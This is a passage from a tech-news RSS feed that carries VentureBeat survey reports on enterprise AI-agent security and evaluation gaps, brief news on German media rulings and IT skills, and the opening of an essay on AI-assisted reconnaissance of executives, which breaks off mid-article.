size, but containment does not. The incident-or-near-miss rate rises from 49% in the mid-market (companies with 101-1,000 employees) to 63% at larger enterprises (above 1,000 employees), while sandbox isolation of high-risk agents falls from 35% to 20%, and satisfaction with security tooling drops from 4.36 to 3.97. The organizations running the most agents across the most systems carry the most incidents and the least of the one control that bounds an incident's blast radius.</p><h2>Finding 2: The identity gap</h2><p><b>Only a third give every agent its own scoped identity</b></p><p>We asked how enterprises manage the identity of their AI agents — whether each agent has its own credentials, or agents share them. Full per-agent identity is the exception.</p><div></div><p>Rolled together, the overlapping answers show 69% of enterprises (74 of 107) with credential sharing somewhere in the agent fleet. Identity is the structural weakness beneath the incidents. Only about a third of enterprises (32%) give every agent its own scoped, managed identity — the precondition for least-privilege access and clean attribution. Nearly half (48%) say some agents have scoped identities but many still share credentials, and another 32% say agents mostly run on shared API keys or borrowed human and service-account credentials. (Respondents could describe more than one pattern across their agent fleet, so these overlap.) </p><p>The consequence is direct: when agents share credentials, an over-permissioned or compromised agent can act with far more reach than intended, and forensics after an incident cannot cleanly tell which agent did what. The non-human identity problem — giving every agent its own governed identity — is the single largest unfinished piece of enterprise agent security.</p><p>Moreover, a company’s agent credential posture is correlated with incidents. Organizations with credential sharing anywhere in the fleet were hit — with an incident or a near-miss in the past twelve months — at 63.5% (47 of 74). Organizations where every agent carries its own scoped identity were hit at 40.9% (9 of 22). The fully-scoped group is small, so for now the relationship is an association rather than proven causation, and the gap is concentrated in the mid-market — but within a single survey, a twenty-three point difference in incident rate suggests significance.</p><h2>Finding 3: Observe and enforce, but rarely isolate</h2><p><b>Only three in 10 sandbox their highest-risk agents</b></p><p>We asked what an organization’s agent security posture looks like in practice — whether they observe, enforce, isolate, or some combination. The control that bounds damage is the least common.</p><div></div><p>Monitoring and enforcement are reasonably common; containment is not. Roughly half of enterprises observe agent activity (47%) or enforce scoped permissions at runtime (49%), but only 30% isolate their highest-risk agents in sandboxes that bound the blast radius when the other controls fail. That ordering is backwards from a defense-in-depth standpoint: observation tells you what happened, enforcement tries to prevent it, but isolation is what limits the damage when prevention fails — and it is the control enterprises have adopted least. Combined with the identity gap in Finding 2, the picture is of agents that are watched and permissioned but rarely boxed in, which is precisely the configuration in which a single failure propagates.</p><h2>Finding 4: Security runs on borrowed, provider-native controls</h2><p><b>Guardrails from OpenAI, Google and Microsoft dominate; specialists barely register</b></p><p>We asked which agent security tooling enterprises use, and which is their primary layer. The answer favors the model providers and hyperscalers over the dedicated security vendors.</p><div></div><p>Enterprises are securing agents with tools that came bundled with their models and clouds. OpenAI’s guardrails lead at 51%, followed by Google’s and Microsoft’s cloud-native controls and Anthropic’s managed-agent controls — and when asked to name their single primary security layer, 82% name one of these provider-native offerings. The purpose-built agent-security category — Palo Alto’s Prisma AIRS, CrowdStrike, Cisco AI Defense, Zenity, HiddenLayer, Check Point’s Lakera, Okta for AI Agents, non-human identity platforms — barely registers, each in the low single digits, and only 5% run no dedicated tooling at all. As with retrieval and evaluation elsewhere in this series, the provider bundle is winning the default: enterprises reach first for the guardrails their platform ships, and the independent security layer that would address the identity and isolation gaps has not yet been adopted at scale.</p><p>The provider-default pattern is consistent across both Q2 survey waves. In April–May (n=110), usage was led by the same names — OpenAI's controls at 26%, Azure at 15%, AWS at 14%, Google at 12% — with every dedicated agent-security specialist at 3% or below and one in ten using no dedicated tooling at all. The common finding from the two surveys: Enterprises are defaulting to the solutions provided by the platform they’re using, and the specialist category vendors have yet to become big players here.</p><p>(<i>A note on reading these shares. As described in the methodology section, the respondent sample is self-selected and skews mid-market, and the usage question counted every vendor or approach a respondent has in place — so the figures measure presence in the security stack rather than spending or exclusivity. Individual vendor percentages therefore carry all the usual sample caveats. The structural pattern, however, held across both Q2 waves on two differently worded questions: provider-native and hyperscaler controls lead, and dedicated agent-security specialists remain in low single digits. Read the individual shares loosely and the pattern with confidence.)</i></p><h2>Finding 5: And enterprises are comfortable with it</h2><p><b>Satisfaction is high, even as incidents mount and identity lags</b></p><p>We asked how satisfied enterprises are with their current agent security tooling. The comfort is notably out of step with the exposure documented above.</p><div></div><p>Satisfaction with agent security tooling is high — 4.2 out of 5 overall, and 4.1 for value for money — among the most positive readings in this series. That is the striking part: enterprises are highly satisfied with a stack that is mostly borrowed provider guardrails, even though more than half have already had an incident or near-miss and only a third give their agents scoped identities. The comfort appears to rest on the convenience and low friction of provider-native controls rather than on demonstrated containment. It is a false comfort in the making — the same enterprises expressing satisfaction are, as Finding 8 shows, a clear majority planning to change tooling within the year, which suggests the confidence is thinner than the score implies.</p><h2>Finding 6: Budgets haven’t caught up</h2><p><b>Most spend under a tenth of the security budget on agents</b></p><p>We asked what share of the security budget enterprises allocate to securing AI agents. For a fast-emerging risk, the allocation is modest.</p><div></div><p>Spending on agent security is still a thin slice. The most common allocation is 6–10% of the security budget (46%), and a third of enterprises (34%) spend 5% or less; only a quarter (24%) devote more than a tenth. Given the incident rate in Finding 1 and the identity and isolation gaps in Findings 2 and 3, the budget looks like a lagging indicator — the risk has arrived faster than the funding to address it. The enterprises spending more than a tenth of their security budget on agents are a distinct minority, and they are likely the ones building the scoped-identity and isolation controls the rest have not.</p><h1>Finding 7: The arms race is even, at best</h1><p><b>Only a third think their AI defenses are ahead of AI-enabled attackers</b></p><p>We asked how enterprises assess the balance between their AI-enabled defenses and AI-enabled attackers. Confidence is far from settled.</p><div></div><p>Enterprises are split on whether they are winning. Only about a third (35%) believe their AI-enabled defenses are ahead of AI-enabled attackers; the rest are less sure — 32% call it roughly even, 21% think attackers are ahead, and another 21% say it is too early to tell. Taken together, a clear majority (53%) rate the balance as even or tilted toward the attacker. That uncertainty sits uneasily beside the high satisfaction of Finding 5: enterprises are content with their tooling yet unconvinced it is winning the contest it exists to win. In a domain where the offense is also compounding with AI, an even race is not a comfortable place to be.</p><h2>Finding 8: A security reshuffle is coming</h2><p><b>Nearly six in 10 plan to adopt or switch tooling within a year</b></p><p>We asked whether enterprises plan to adopt a new, additional, or replacement agent security solution, and which they are considering. Few intend to stand pat.</p><div></div><p>The security stack is not settled. While 41% have no plans to change, a clear majority (59%) intend to adopt a new, additional, or replacement agent security solution within twelve months, and 29% within the next quarter — a strong signal that, high satisfaction notwithstanding, enterprises know the current stack is provisional. Incidents are what start the buying cycle. </p><p>Among organizations that have been hit, 42.1% plan to adopt, add, or replace agent security tooling within the next ninety days, against 14.0% of organizations with no incident — and after a confirmed incident it becomes majority behavior, at 52.6%. Getting hit also changes the threat assessment: 33.3% of hit organizations say AI-armed attackers are ahead of their defenses, against 8.0% of the unhit. Experience, in this data, is the strongest predictor of both urgency and pessimism.</p><p>The consideration set still leans provider-native (OpenAI 34%, Google 30%, Anthropic 29%, Azure 25%), but the dedicated security vendors — Cloudflare, Cisco, Palo Alto, Okta, Check Point’s Lakera — draw early interest in the mid-to-high single digits, more than their current footprint. </p><p>What the shopping does not yet include is the identity layer specifically. Twelve percent of the respondents include an agent-identity product — Okta for AI Agents, Microsoft Entra Agent ID, or a non-human identity platform — anywhere in their consideration set, and among the credential-sharing organizations that have already had an incident, identity consideration is essentially unchanged, at roughly one in ten. The control most directly implicated by the incident data is the one largely missing from the purchase plans. Whether this wave hardens the provider-native default or finally opens the door to purpose-built agent security — the identity and isolation controls the incidents call for — is the question this series will keep tracking.</p><h2>The bottom line: A security gap that autonomy will test first</h2><p>Organizations with more than 100 employees are giving AI agents real reach into systems and data while securing them with controls built for something else. More than half have already had an incident or near-miss; only a third give every agent its own scoped identity, and most still share credentials; only three in ten isolate their highest-risk agents; and the stack doing this work is overwhelmingly borrowed from the model providers and hyperscalers rather than purpose-built for agents.</p><p>The uncomfortable pairing is confidence with exposure: satisfaction with the current tooling is among the highest in this series, yet spending is a thin slice of the security budget, only a third believe their defenses are ahead of AI-enabled attackers, and a clear majority are already planning to replace what they have. At 107 respondents in a single wave this is a directional read, skewed toward the mid-market — but the direction is clear: agent adoption is running ahead of agent security, and the controls that matter most when something fails — scoped identity and isolation — are the ones enterprises have built least. The agent security gap is not a coverage problem that a provider guardrail will close on its own; it is a problem of identity, isolation, and enforcement built for autonomous software. The open question for later waves is whether enterprises close it deliberately — or whether a confirmed incident closes it for them.</p><hr><p><i>Based on survey responses from 107 qualified enterprise respondents (100+ employees), drawn from a single June 2026 wave. This is a directional read, not a precise measurement — the sample is self-selected and skews mid-market, so it's best read as the view from organizations actively standing up agent security rather than from the largest operators. Respondents are senior and buyer-credible (45% final decision-makers, 30% recommenders/influencers), spanning managers through the C-suite, and drawn primarily from Technology/Software, Manufacturing, Retail/E-commerce, and Healthcare/Life Sciences.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The agent evaluation gap: Enterprise AI organizations have a reality-alignment problem, not a coverage problem — and most are shipping to production anyway]]></title>
<description><![CDATA[Across 157 enterprises, organizations are granting AI agents more autonomy while trusting the evaluations meant to gate that autonomy less. Half have already shipped an agent that passed their internal evaluations and then failed a customer in production; only one in twenty fully trusts automated...]]></description>
<link>https://tsecurity.de/de/3674237/it-nachrichten/the-agent-evaluation-gap-enterprise-ai-organizations-have-a-reality-alignment-problem-not-a-coverage-problem-and-most-are-shipping-to-production-anyway/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674237/it-nachrichten/the-agent-evaluation-gap-enterprise-ai-organizations-have-a-reality-alignment-problem-not-a-coverage-problem-and-most-are-shipping-to-production-anyway/</guid>
<pubDate>Thu, 16 Jul 2026 19:03:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Across 157 enterprises, organizations are granting AI agents more autonomy while trusting the evaluations meant to gate that autonomy less. Half have already shipped an agent that passed their internal evaluations and then failed a customer in production; only one in twenty fully trusts automated evaluation today; and the most-cited weakness is that evaluations do not align with real-world outcomes. Yet two-thirds already allow, or are actively engineering toward, deploying agent changes to production on automated evaluation alone — with no human in the loop. The result is an evaluation gap — the distance between how much autonomy enterprises are handing their agents and how far they trust the tests that are supposed to catch the failures.</p><p>This wave of VentureBeat Pulse Research examines how technical leaders measure agent performance: which reliability and evaluation platforms they use, how they select and trust them, what breaks in production, and how far they are willing to let agents run without a human in the loop.</p><p>The central finding is an evaluation gap — the distance between the autonomy enterprises are granting their agents and the trust they place in the evaluations meant to govern it. Half of organizations (50%) have, in the past year, deployed an agent or LLM feature that passed their internal evaluations and then caused a customer-facing failure, and a quarter have seen it happen more than once. Trust in the tests themselves is thin: only 5% say they fully trust automated evaluation today, and the single most-cited limitation is that evaluations align poorly with real-world outcomes (29%). Enterprises are discovering that a passing eval is not the same as a working agent.</p><p>What makes the gap consequential is the direction of travel. Two-thirds of organizations (66%) already permit fully automated, zero-human-in-the-loop deployment for low-risk agents (34%) or are actively engineering their pipelines to allow it within twelve months (33%). At the same time, the evaluation stack that would have to earn that trust is fragmented and immature: the most common primary tools are the model providers’ native evals, tied with having no dedicated tooling at all (17% each); and only about a quarter of enterprises run real-time quality checks on live production traffic. The autonomy is arriving faster than the assurance.</p><h2>Methodology</h2><p>VentureBeat fielded this survey as part of its ongoing Pulse Research series, this survey — the Agentic Reliability &amp; Evals tracker — focused on how technical leaders evaluate agent performance and reliability. Responses are filtered to organizations with 100 or more employees (n=157), drawn from a single survey in June 2026; because this is one wave rather than a pooled multi-month sample, the report reads cross-sectionally and does not infer month-over-month trends. Where questions were multiple-select, those shares can sum to more than 100%.</p><p>By role the sample is senior and buyer-credible: 38% are final decision-makers for AI purchases and another 34% recommenders or influencers. Product and program managers (15%), consultants and advisors (10%), directors of engineering/IT (8%), and CIOs/CTOs/CISOs (8%) lead the named titles, alongside a large “Other” function (37%). By organization size the sample is mid-market-weighted: 100–499 (37%) and 500–2,499 (27%) employees lead, with 2,500–9,999 (20%), 10,000–49,999 (10%), and 50,000+ (6%) above them. Technology/Software is the largest industry at 23%, followed by Retail/Consumer (15%), Healthcare/Life Sciences (12%), and Manufacturing (10%).</p><p>At 157 respondents the sample is large enough to read directionally but should be treated as a directional signal rather than a precise measurement; it is self-selected and is not a probability sample. It skews toward the mid-market, so it is best read as the view from organizations actively standing up agent evaluation practices rather than from the largest operators.</p><p><i>Note: This survey was rebuilt for the June wave from the earlier “LLM observability and evaluations” survey; because the questions and sample differ, no comparisons are made to the April–May data.</i></p><h1>Finding 1: A passing eval is not a working agent</h1><p><b>Half have shipped an agent that passed evals, then failed a customer</b></p><p>We asked whether, in the past 12 months, organizations had deployed an agent or LLM feature that passed their internal evaluations but then caused a customer-facing failure. Half of those that run evaluations had.</p><div></div><p>This is the report’s defining number. Half of organizations (50%) have shipped an AI feature that cleared their internal evaluations and then failed in front of a customer — an incorrect output, a broken workflow, or a quality incident — and a quarter have seen it happen more than once. Only 36% report no such failure, and the remainder either run no pre-deployment evaluations (8%) or don’t track the root cause closely enough to know (6%). The failure is precise and expensive: the evaluation said the agent was ready, and it was not. Everything that follows — how enterprises trust their evals, what they monitor, and how much autonomy they grant — is shaped by this experience.</p><h2>Finding 2: Almost no one fully trusts automated evaluation</h2><p><b>The top complaint: Evals don't match real-world outcomes</b></p><p>We asked which limitation most reduces trust in automated agent evaluations today. Only a sliver of enterprises had no complaint at all.</p><div></div><p>Trust in automated evaluation is scarce, and specific. Only 5% of organizations say they fully trust automated evaluation as it stands — meaning 95% name a limitation that holds them back. The most common, at 29%, is the one that most directly explains Finding 1: evaluations align poorly with real-world outcomes, passing agents that later fail. Bias or inconsistency (21%) and a lack of explainability (18%) follow — enterprises cannot always tell why an evaluation reached its verdict — and 17% cite data-leakage or privacy concerns in the evaluation process itself. The tests meant to certify agents are not yet trusted to certify them, which is precisely why the autonomy trajectory in Finding 3 is so striking.</p><h2>Finding 3: The autonomy ceiling is rising anyway</h2><p><b>Two-thirds already allow, or are building toward, zero-human deployment</b></p><p>We asked whether organizations would let an autonomous agent deploy a code or system change to production on automated evaluation results alone, with no human-in-the-loop validation. The trajectory runs straight through the trust gap.</p><div></div><p>Here is the paradox at the heart of the report. Even though almost no one fully trusts automated evaluation (Finding 2), two-thirds of organizations (66%) either already allow zero-human-in-the-loop deployment for low-risk agents (34%) or are actively engineering their pipelines to permit it within a year (33%). Only 22% rule it out for the foreseeable future. The direction is unambiguous: enterprises are moving to let evaluations gate production autonomously — removing the human check — at the same moment they say those evaluations don’t reliably match reality. The autonomy ceiling is rising faster than the assurance beneath it, which is the mechanism by which the false-confidence failures of Finding 1 will scale rather than shrink.</p><p>Notably, the autonomy bet is not just a small company phenomenon. Splitting the sample by company size, larger enterprises are slightly further down the path toward zero human review than smaller companies (70% versus 64%) and slightly more likely to have shipped an evaluation-passing agent that then failed a customer (54% versus 48%). The assumption that large, regulated organizations are holding the human in the loop longest is, in this sample, backwards.  To be sure, these are directional figures, since the survey was not a huge sample — 57 respondents from companies with 2,500+ employees and 100 from companies smaller than that. </p><h2>Finding 4: The evaluation stack is fragmented and provider-led</h2><p><b>Provider-native evals lead — tied with no dedicated tool at all</b></p><p>We asked which agent reliability or evaluation platform enterprises primarily use today. The market has no clear leader — and a large share has nothing dedicated.</p><div></div><p>The evaluation layer is early and unconsolidated. Provider-native tooling leads — OpenAI’s native evals and traces (17%) and Anthropic’s Claude Console evals (13%) together outweigh any independent platform — but it is tied at the top by a striking answer: 17% of enterprises use no dedicated agent-evaluation tooling at all, a notable gap for organizations shipping agents to customers. The specialist evaluation vendors — DeepEval (12%), Braintrust (8%), LangSmith, Weave, Promptfoo, Langfuse, Arize — are scattered across single to low double digits, and 11% have built their own. No independent platform has yet become the category standard, which leaves most enterprises evaluating agents with provider-native tools, home-grown scripts, or nothing.</p><h2>Finding 5: Production monitoring rarely watches output quality</h2><p><b>Only a quarter run real-time quality checks on live traffic</b></p><p>Production monitoring for an AI agent can watch two very different things. It can watch whether the system is <b>functioning</b> — is the agent up and responding, did each request complete, how fast, at what cost, with any errors. Or it can watch whether the agent's output is <b>correct</b> — automated checks that evaluate the content of each answer as it goes out: did the agent give the right answer, take the right action, stay within policy. The distinction matters because a confidently wrong answer is invisible to the first kind of monitoring: the request completes, the response is fast, no error is thrown, and every functioning-metric reads healthy. We asked organizations which kind their live production monitoring is built for today.</p><div></div><p>Grouped by what is actually being watched, the split is stark: 51% of organizations monitor only whether the agent is functioning, while 23% monitor whether its answers are right. Counting the ad-hoc reviewers and the don't-knows, roughly three-quarters of organizations run no automated, real-time evaluation of output correctness in production — they can see that the system is up and what it costs, and they are taking the correctness of its answers on faith. That blind spot is the runtime counterpart to the pre-deployment gap in Finding 1: the same organizations engineering the human out of the deployment decision mostly cannot see, in real time, when the deployed agent starts getting things wrong.</p><h2>Finding 6: Bought on cost, measured on consistency</h2><p><b>Price and integration drive selection; evaluation consistency is the goal</b></p><p>We asked what most influenced enterprises’ choice of an evaluation vendor, and what they treat as their primary measure of success. Both answers are pragmatic.</p><div></div><p>Enterprises buy evaluation tooling on economics and trust it on repeatability. Cost of evaluations (28%) narrowly leads selection, just ahead of ease of integration (27%) and evaluation accuracy (24%) — breadth of observability (13%) and vendor roadmap (4%) matter far less. On what success looks like, more than a third (36%) name evaluation consistency — getting the same verdict on the same behavior every time — well ahead of speed of experimentation (19%), reduction in failures (18%), production visibility (13%), and compliance (11%). The emphasis on consistency is telling: before enterprises can trust an evaluation’s verdict, they need it to be stable — the very property whose absence (bias and inconsistency) ranked among the top trust limitations in Finding 2. Satisfaction with current tooling is only moderate, averaging 3.8 on a five-point scale across overall satisfaction, ease of implementation, and value for money.</p><h2>Finding 7: The next dollar goes to humans and observability</h2><p><b>Investment is flowing to oversight, not just automation</b></p><p>We asked which reliability and evaluation investment will grow most over the next year. The money is going toward watching agents more closely — including with people.</p><div></div><p>The second-largest planned investment — behind only production observability — is human review workflows, at 26%. Read against Finding 1, that is the report's quietest contradiction: at the same moment two-thirds of enterprises are engineering the human out of the deployment decision, more of them plan to grow spending on human reviewers (26%) than on the automated evaluation pipelines (16%) that would replace them. The zero-human trajectory and the human-review budget are rising in the same companies at the same time. Indeed, only 8% report that their budget is not increasing. </p><p>Taken together, enterprises are hedging: building toward autonomy while spending to watch agents more closely and keep humans available for the calls that automated evaluation cannot yet be trusted to make.</p><h2>Finding 8: A tooling reshuffle is coming</h2><p><b>Nearly two-thirds plan to adopt or switch platforms within a year</b></p><p>We asked whether enterprises plan to adopt a new, additional, or replacement evaluation platform, and which they are considering. Few intend to stand pat.</p><div></div><p>The evaluation market is wide open. While 36% have no plans to change, a clear majority (64%) intend to adopt a new, additional, or replacement platform within twelve months, and 31% within the next quarter. The consideration set points where current usage is thinnest: Confident AI’s DeepEval leads what enterprises are evaluating (20%), ahead of OpenAI’s native evals (13%) and Braintrust (9%) — the open-source specialists drawing more interest than their present footprint. </p><p>Given that so many enterprises today rely on provider-native tools or nothing at all (Finding 4), this is less a defection than a first real wave of tooling adoption — the moment the evaluation layer starts to consolidate. Which platforms earn that trust, in a market where almost no one trusts automated evaluation yet, is the open question this series will keep tracking.</p><h2>The bottom line: An evaluation gap that autonomy will widen, not close</h2><p>Organizations with 100 or more employees are granting AI agents more independence than they trust their evaluations to support. Half have already shipped an agent that passed its evals and then failed a customer; almost none fully trust automated evaluation, chiefly because it doesn’t match real-world outcomes; and most watch production for uptime and cost rather than for whether the agent’s answers are right. Yet two-thirds already allow, or are actively building toward, deploying to production on automated evaluation alone.</p><p>The vendor market is early and unsettled: the most common primary evaluation tools are provider-native evals, tied with no dedicated tooling at all, and a clear majority plan to adopt or switch platforms within the year. Encouragingly, the next dollar is going to observability and — pointedly — human review, suggesting enterprises sense the gap even as they engineer past it. At 157 respondents in a single wave this is a directional read, skewed toward the mid-market — but the direction is clear: autonomy is being granted on the strength of evaluations that the people granting it do not yet trust. The evaluation gap is not a coverage problem that more tests alone will close; it is a problem of evaluations that reflect reality and can be trusted to gate it. The open question for later waves is whether assurance catches up to autonomy — or whether the false-confidence failures move from customer incidents into changes that deploy themselves.</p><hr><p><i>Based on survey responses from 157 qualified enterprise respondents (100+ employees), drawn from a single June 2026 wave. This is a directional read rather than a precise measurement — the sample is self-selected, not a probability sample, and skews toward the mid-market. Respondents include product and program managers, consultants and advisors, directors of engineering/IT, and CIOs/CTOs/CISOs, among other functions, across technology/software, retail/consumer, healthcare/life sciences, manufacturing, and other industries.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Germany puts Google's AI Overviews and Perplexity under media law in first-of-its-kind ruling]]></title>
<description><![CDATA[German media regulators say Google's AI Overviews are Google's own content, not neutral search results, and that they crowd out regular links. The regulators have issued their first rulings against Google and Perplexity under the country's State Media Treaty. Both companies have one month to appe...]]></description>
<link>https://tsecurity.de/de/3674075/ai-nachrichten/germany-puts-googles-ai-overviews-and-perplexity-under-media-law-in-first-of-its-kind-ruling/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674075/ai-nachrichten/germany-puts-googles-ai-overviews-and-perplexity-under-media-law-in-first-of-its-kind-ruling/</guid>
<pubDate>Thu, 16 Jul 2026 18:20:17 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1376" height="768" src="https://the-decoder.com/wp-content/uploads/2026/07/google_ai_overviews_germany.png" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high"></p>
<p>        German media regulators say Google's AI Overviews are Google's own content, not neutral search results, and that they crowd out regular links. The regulators have issued their first rulings against Google and Perplexity under the country's State Media Treaty. Both companies have one month to appeal.</p>
<p>The article <a href="https://the-decoder.com/germany-puts-googles-ai-overviews-and-perplexity-under-media-law-in-first-of-its-kind-ruling/">Germany puts Google's AI Overviews and Perplexity under media law in first-of-its-kind ruling</a> appeared first on <a href="https://the-decoder.com/">The Decoder</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT leaders prioritize addressing AI skill concerns]]></title>
<description><![CDATA[Recent data from the CompTIA Tech Jobs Report shows that tech jobs have seen a drop in unemployment, down to 3.1% in May from 3.5% in April, accounting for an increase of around 6,700 in May. Roles that saw the highest demand include software developers and engineers, systems engineers and archit...]]></description>
<link>https://tsecurity.de/de/3672916/it-nachrichten/it-leaders-prioritize-addressing-ai-skill-concerns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672916/it-nachrichten/it-leaders-prioritize-addressing-ai-skill-concerns/</guid>
<pubDate>Thu, 16 Jul 2026 11:18:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Recent data from the <a href="https://www.comptia.org/en-us/resources/research/tech-jobs-report/">CompTIA Tech Jobs Report</a> shows that tech jobs have seen a drop in unemployment, down to 3.1% in May from 3.5% in April, accounting for an increase of around 6,700 in May. Roles that saw the highest demand include software developers and engineers, systems engineers and architects, tech support specialists, cybersecurity engineers and analysts, and AI engineers.</p>



<p class="wp-block-paragraph">And according to projections form the <a href="https://www.bls.gov/opub/mlr/2026/article/industry-and-occupational-employment-projections-overview.htm">U.S. Bureau of Labor Statistics</a>, the tech workforce is anticipated to grow twice as fast as the overall US workforce, with an expected replacement rate of 6% annually, or approximately 323,000 workers, for tech occupations between 2024 and 2034.</p>



<p class="wp-block-paragraph">“More than ever, business success relies on technology,” said Seth Robinson, VP of  industry research at CompTIA. “Our research has shown a desire to build capability in core operational functions, which then allows companies to build advanced practices in AI, data, and cybersecurity.”Further data, this time from the <a href="https://www.comptia.org/en-us/resources/research/state-of-the-tech-workforce-2026/">CompTIA Sate of the Tech Workforce 2026</a> report, shows that 83% of IT leaders and HR professionals say their organizations are placing a high or moderately high priority on addressing skill concerns, and 62% say they expect the budget for AI training to increase in the next year. Organizations also seem to recognize the impact that skills development can have on employees, with 83% saying they expect these investments to have a high or moderate degree of impact on employee morale and engagement.</p>



<h2 class="wp-block-heading">Cause and effect</h2>



<p class="wp-block-paragraph">There are two main factors driving the skills gap and pushing IT leaders to invest in training programs: AI accelerating technological change, and a shortage of AI skilled professionals in the hiring market. However, while AI is a main driver in the skills gap, 48% of IT leaders also say AI is crowding out other important needs, including a much-needed shift to skills-based hiring methodologies.</p>



<p class="wp-block-paragraph">IT leaders are looking to build training programs that specifically address AI basics, data analysis, AI threat awareness, automation, data preparation, securing AI systems, building inputs and prompts, and creating AI agents. Currently IT leaders cite cost of training, training fatigue, turnover, lack of executive support, difficulty measuring ROI, and stale training curriculum as some of the biggest challenges when developing training programs, according to CompTIA.</p>



<p class="wp-block-paragraph">So organizations that embark on upskilling and training will need a robust strategy in place to ensure employees take advantage of the training and remain engaged. Leaders will also need to set the expectations for how to integrate training into daily work, so they aren’t left feeling overwhelmed by the process on top of their current roles.</p>



<p class="wp-block-paragraph">“What we’ve found that works is to embed AI into people’s workflows after the initial training, and pair people with colleagues who are further along in their AI utilization,” says Maruf Ahmed, CEO of IT solutions provider Dexian. “The gap between ‘I attended the training’ and ‘I’m actually using this differently in my job’ is where companies lose people, and closing it takes more than a single training cycle.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The executive profile your security team isn’t defending]]></title>
<description><![CDATA[A few years ago, I was retained to conduct a digital risk review for the chief executive of a mid-sized financial services firm. The brief was standard. Assess what was publicly available about the executive, identify exposure and advise on remediation. The AI tools I used completed the substanti...]]></description>
<link>https://tsecurity.de/de/3672879/it-security-nachrichten/the-executive-profile-your-security-team-isnt-defending/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672879/it-security-nachrichten/the-executive-profile-your-security-team-isnt-defending/</guid>
<pubDate>Thu, 16 Jul 2026 11:09:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A few years ago, I was retained to conduct a digital risk review for the chief executive of a mid-sized financial services firm. The brief was standard. Assess what was publicly available about the executive, identify exposure and advise on remediation. The AI tools I used completed the substantive reconnaissance in under ten minutes.</p>



<p class="wp-block-paragraph">What came back was a synthesized profile. Board memberships and the dates they started. A pattern of public commentary that revealed which policy positions the executive held strongly and which ones he would likely bend on under pressure. A philanthropic interest that explained which causes he would respond to if someone framed an ask around them. None of this information was sensitive in isolation. But assembled into a single, queryable narrative, it was something an attacker could use immediately.</p>



<p class="wp-block-paragraph">What I was looking at was a publicly accessible query to a general-purpose AI tool. And that is the problem most executive protection programs have not yet confronted. The reconnaissance phase for a targeted social engineering attack now takes minutes, not days, and the inputs required are trivial.</p>



<p class="wp-block-paragraph">AI-aggregated executive data has become an attack surface. Most security programs have not yet adapted to it.</p>



<h2 class="wp-block-heading"><a></a>The reconnaissance phase has effectively collapsed</h2>



<p class="wp-block-paragraph">Traditional <a href="https://www.csoonline.com/article/567859/what-is-osint-top-open-source-intelligence-tools.html">OSINT</a> work against an executive target required skill and patience. A competent analyst could build a useful profile over several days by working through search engines, corporate filings, social platforms and archived media. That work was a meaningful barrier. It took time and it required judgment about which sources to trust. It also left trails if the attacker was careless.</p>



<p class="wp-block-paragraph">AI aggregation removes all three constraints.</p>



<p class="wp-block-paragraph">The speed advantage is obvious but it is not the most important change. The more significant shift is synthesis. A search engine returns documents. An AI tool returns a coherent narrative with inferred relationships and interpreted significance. When I query a major AI platform for a senior executive by name, I get a structured account of their career arc, their professional relationships, their areas of visible influence and frequently their personal interests, relationships and public-facing affiliations.</p>



<p class="wp-block-paragraph">The <a href="https://westoahu.hawaii.edu/cyber/global-weekly-exec-summary/alphv-hackers-reveal-details-of-mgm-cyber-attack/">MGM Resorts incident </a>reported in 2023 illustrated the principle at scale. Attackers reportedly identified an MGM executive on LinkedIn, used that public profile information to impersonate them in a call to the IT help desk and obtained access credentials within minutes. The OSINT required was minimal and the manipulation was straightforward. What AI tools have done since is make that kind of reconnaissance faster, more complete and available to actors who lack the manual tradecraft to run it themselves.</p>



<p class="wp-block-paragraph">As the<a href="https://www.verizon.com/business/resources/reports/dbir/"> Verizon Data Breach Investigations Report </a>consistently documents, the human element is present in the majority of confirmed breaches, and social engineering remains one of the most reliable initial access vectors.</p>



<p class="wp-block-paragraph">The accessible nature of AI tools is also expanding the threat population. Attacks that previously required a skilled analyst to design now require only a motivated actor with internet access. That changes the volume and targeting calculus. Executives who were previously too obscure to justify a sophisticated manual attack are now viable targets for anyone with a grievance and a query box.</p>



<h2 class="wp-block-heading"><a></a>What should CIOs and CISOs do about it?</h2>



<p class="wp-block-paragraph">The instinct in many organizations is to route anything involving an executive’s public profile to the comms or PR function. That instinct made sense when the risk was reputational. It no longer covers the exposure.</p>



<p class="wp-block-paragraph">What follows is how I advise clients to structure this work.</p>



<h3 class="wp-block-heading">Monitor regularly</h3>



<p class="wp-block-paragraph">The starting point is establishing visibility into what AI tools are actually returning about your executive population. Not a one-time audit conducted during a board meeting and forgotten. The profiles shift continuously as new content is indexed, old content is reweighted and the models are updated.</p>



<p class="wp-block-paragraph">Assign ownership to run structured queries across the major platforms, including ChatGPT, Gemini, Perplexity and the Microsoft Copilot stack, on a regular cadence. Document what you find and track changes. Treat the output the same way you would treat a vulnerability scan as something to be prioritized and acted upon.</p>



<h3 class="wp-block-heading">Reduce the available attack surface</h3>



